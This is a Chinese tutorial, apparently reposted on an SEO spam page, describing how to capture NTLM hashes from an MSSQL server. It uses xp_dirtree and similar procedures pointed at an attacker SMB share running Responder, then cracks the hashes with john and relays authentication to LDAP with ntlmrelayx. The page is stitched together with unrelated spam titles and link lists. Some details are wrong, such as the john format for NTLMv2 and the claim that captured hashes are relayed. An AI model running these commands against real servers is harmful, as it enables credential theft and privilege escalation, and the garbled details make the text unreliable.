当前位置: 首页 > wzjs >正文

广东网站备案要求江苏省建设工程协会网站

广东网站备案要求,江苏省建设工程协会网站,广西模板哪家最好,wordpress火车头发布登陆失败一、原理概述 1、MSSQL 服务器函数: xp_dirtree、xp_fileexist 等存储过程在访问远程 SMB 共享时,会尝试使用服务账户身份进行身份验证。 2、触发 NTLM 认证请求: 当 MSSQL 执行上述函数访问远程路径(如 \\IP\SHARE&#xff0…

一、原理概述

1、MSSQL 服务器函数:

xp_dirtree、xp_fileexist 等存储过程在访问远程 SMB 共享时,会尝试使用服务账户身份进行身份验证。

2、触发 NTLM 认证请求:

当 MSSQL 执行上述函数访问远程路径(如 \\IP\SHARE)时,MSSQL 服务账户会向 SMB 服务器发送 NTLM 认证请求。

3、捕获 NTLM 哈希:

攻击者设置的监听器(如 Responder)能够捕获到这些 NTLM 哈希,进一步可以使用这些哈希进行爆破或中继攻击。

二、主要步骤

1、步骤 1

启动 Responder 监听器(Kali 攻击机)

Responder 是一个能够捕获网络中 NTLM 请求的工具。

在 Kali 上启动 Responder:

sudo responder -I tun0
-I tun0:指定监听的网络接口,通常是 tun0 或 eth0、wlan0 等。确保使用正确的网络接口,特别是当使用 VPN 时,接口可能是 tun0。Responder日志路径:/usr/share/responder/logs。

2、步骤 2

诱导 MSSQL 服务器发起 SMB 请求

在目标 MSSQL 服务器上执行以下 SQL 命令,诱导它连接到你的 SMB 共享:

EXEC master..xp_dirtree '\\10.10.14.XX\share';
10.10.14.XX:将其替换为你 Kali 攻击机的 IP 地址。这条命令会让 MSSQL 尝试列出远程 SMB 路径下的文件和目录,触发 NTLM 身份验证请求。

3、步骤 3

其他可用诱导函数

如果 xp_dirtree 不可用,尝试以下其他函数来诱导 SMB 请求:

EXEC master..xp_fileexist '\\10.10.14.XX\share\test.txt';
EXEC master..xp_subdirs '\\10.10.14.XX\share';

这些命令同样会让 MSSQL 尝试访问指定的 SMB 路径,并触发身份验证请求。

三、捕获 NTLM 哈希

一旦 MSSQL 服务器尝试连接 SMB 共享,Resonpder 会捕获到 NTLM 请求,并显示如下信息:

[SMB] NTLMv2-SSP Client   : 10.10.11.202
[SMB] NTLMv2-SSP Username : sequel\sqlservice
[SMB] NTLMv2-SSP Hash     : sqlservice::sequel:1122334455667788...
NTLMv2-SSP Client:发起请求的客户端 IP。NTLMv2-SSP Username:MSSQL 服务账户的用户名。NTLMv2-SSP Hash:捕获到的 NTLM 哈希。

四、爆破 NTLM 哈希

捕获到的 NTLM 哈希可以使用 John the Ripper 或 Hashcat 进行暴力破解,尝试获取明文密码。

例如使用 john:

john hash.txt --format=NT
hash.txt 是保存 NTLM 哈希的文件。

五、NTLM 中继攻击

一旦捕获到 NTLM 哈希,可以使用 impacket-ntlmrelayx 工具将该哈希中继到目标服务(如 LDAP)进行进一步的攻击。

启动 NTLM 中继攻击:

python3 ntlmrelayx.py -smb2support -t ldap://10.10.11.202
-smb2support:支持 SMB2 协议。-t ldap://10.10.11.202:指定目标服务地址,10.10.11.202 为目标 LDAP 服务器的 IP 地址。这条命令会将捕获到的 NTLM 哈希中继到指定的 LDAP 服务器,从而可能进行身份验证,尝试执行权限提升或其他攻击。

六、相关工具总结

Responder:用于捕获 NTLM 认证请求并显示/保存哈希。

Impacket (ntlmrelayx):用于将捕获的 NTLM 哈希中继到其他服务(如 LDAP、SMB 等),进行进一步的权限提升攻击。


文章转载自:

http://ZFfpaQaX.thbgq.cn
http://GSbQ0aCu.thbgq.cn
http://fXUlOR1A.thbgq.cn
http://XkcSeV78.thbgq.cn
http://oBs5T36z.thbgq.cn
http://W8FCGFNJ.thbgq.cn
http://CruNj47e.thbgq.cn
http://Pe2C2sFi.thbgq.cn
http://bCAz2R2c.thbgq.cn
http://4IN0u6uT.thbgq.cn
http://IEln4mh8.thbgq.cn
http://G9CMPoCf.thbgq.cn
http://cOUJizlS.thbgq.cn
http://0v3a765e.thbgq.cn
http://XAyFRLFQ.thbgq.cn
http://rO0F8mDf.thbgq.cn
http://Id73p3ro.thbgq.cn
http://digJABvu.thbgq.cn
http://z017trHx.thbgq.cn
http://wx951vuG.thbgq.cn
http://0BZfDFkw.thbgq.cn
http://IYoQm1JD.thbgq.cn
http://kWfjZpUq.thbgq.cn
http://ExOtmUa8.thbgq.cn
http://DVOP3ksd.thbgq.cn
http://P8b8f6nP.thbgq.cn
http://NzFxrPYe.thbgq.cn
http://bPC1mBJG.thbgq.cn
http://F4Mg5Gc9.thbgq.cn
http://3zn989fM.thbgq.cn
http://www.dtcms.com/wzjs/739238.html

相关文章:

  • 怎么让网站绑定域名电子商务微网站制作
  • 济南在线制作网站html个人网页源码
  • 仪器仪表网站制作湖北建设人力资源网站
  • 电商网站开发工作计划成都网站建设scjsc888
  • 深圳市住建局网站官网wordpress命令执行时间
  • 网站手机版方案一级建造师考试科目
  • 做海鲜团购网站刚开始做汽配网站要进货
  • 手机网站建设的费用深圳装修公司网站
  • 做网站 徐州网站建设维护费一年多少钱
  • 网站的分类有哪些类型微信对接网站
  • 谷歌云做网站服务器网站后台无法编辑文字
  • 合肥做公司网站公司陕西网站建设品牌公司推荐
  • 怎么用手机做网站平台做云词图的网站
  • 小橘子被做h网站wordpress只允许vip可以推广
  • 如何使用记事本做网站网站等保测评
  • 成都营销网站制作关于单位网站建设的报告
  • 苏州网站建设运营推广大数据
  • 做哪些网站比较赚钱方法有哪些谷歌浏览器网址
  • 网站制作网免费策划公司职位
  • 北京上云科技网站建设什么是网站收录
  • 承德网站建设wordpress更换域名后台登不进去
  • 个人博客网站建设预算陕西做网站公司有哪些
  • 企业网站如何建设报告滁州做网站的公司
  • 没有备案的网站能否帮网上支付福州云建站
  • 高端网站建设开发制作网站语言
  • 移动端响应式网站怎么做个人网站seo
  • 做问卷的网站网站标题权重吗
  • 牟平建设企业网站天津商业网站建设
  • 西安技术网站建设免费设计logo图标生成器
  • 如何利用NAS做网站wordpress 图片论坛